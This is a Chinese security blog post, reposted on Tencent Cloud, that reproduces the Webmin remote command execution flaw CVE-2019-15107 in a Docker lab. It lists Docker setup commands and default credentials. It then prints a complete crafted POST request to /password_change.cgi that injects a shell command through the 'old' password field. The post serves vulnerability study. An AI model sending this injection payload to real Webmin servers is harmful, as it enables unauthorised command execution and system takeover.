CVE-2019-15107：Webmin RCE复现

Timeline Sec

发布于 2019-12-15 12:06:59

1K0

发布于 2019-12-15 12:06:59

文章被收录于专栏：Timeline SecTimeline Sec

0x00 前言

本来前一阵就想复现来着，但是官网的版本已经更新了，直到今天才发现Docker上有环境，才进行了复现

0x01影响版本

Webmin<=1.920

0x02 环境搭建

docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba

访问你的ip:10000即可访问1.920版本的webmin

使用账号密码：root/webmin登录到后台

开启密码重置功能：

Webmin--Webmin confuration--Authentication

0x03 漏洞利用

经过长时间的寻找，未找到修改密码的接口，所以随便抓个包手动构造了一个，数据包如下：

POST /password_change.cgi HTTP/1.1
Host: 136.244.xx.xx:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 49
DNT: 1
Connection: close

user=laemon&old=123123|id&new1=123456&new2=123456

最终执行命令成功

参考文章：

https://paper.seebug.org/1019/

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2019-09-01，如有侵权请联系 cloudcommunity@tencent.com 删除

网站

本文分享自 Timeline Sec 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

网站

登录后参与评论

0 条评论

热度

CVE-2019-15107：Webmin RCE复现

CVE-2019-15107：Webmin RCE复现

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐